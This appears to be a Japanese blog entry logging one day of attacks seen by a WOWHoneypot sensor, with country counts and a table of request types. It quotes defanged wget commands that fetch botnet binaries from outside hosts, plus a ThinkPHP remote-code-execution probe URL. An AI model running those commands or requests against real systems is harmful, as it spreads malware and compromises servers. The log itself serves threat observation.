23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(235日目)

2019/11/06(水)

トータルは2372件でした。

ハンティングログは以下です。

176.109.226[.]203 wget+hxxp[:]//185.172.110[.]220/mipsel
75.91.204[.]181 wget+hxxp[:]//185.172.110[.]220/mipsel
149.71.49[.]21 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

185.199.26[.]162 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang[.]mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

フィンランド 2278
アメリ 27
中国 25
ブラジル 9
オランダ 6
ドイツ 5
イラン 3
イタリア 2
ロシア 2
ケニア 2
トルコ 1
チェコ 1
フランス 1
ウクライナ 1
インドネシア 1
イラク 1
イギリス 1
メキシコ 1
チリ 1
リビア 1
韓国 1
マレーシア 1
バングラデシュ 1

f:id:sec23:20191124043444p:plain

件数 概要 リクエス
2280 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
57 アクセス GET /
5 調査 GET /script
4 POST /tmUnblock.cgi
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
2 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
2 不正中継の試み CONNECT www.ip.cn:443
2 不正中継の試み CONNECT www.baidu.com:443
2 不正中継の試み CONNECT cn.bing.com:443
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 クローリング HEAD /robots.txt
1 調査 HEAD /
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 phpMyAdminの調査 GET /mysql/admin/index.php?lang=en
1 Joomla!脆弱性(CVE-2016-8870)の調査 GET /index.php/component/users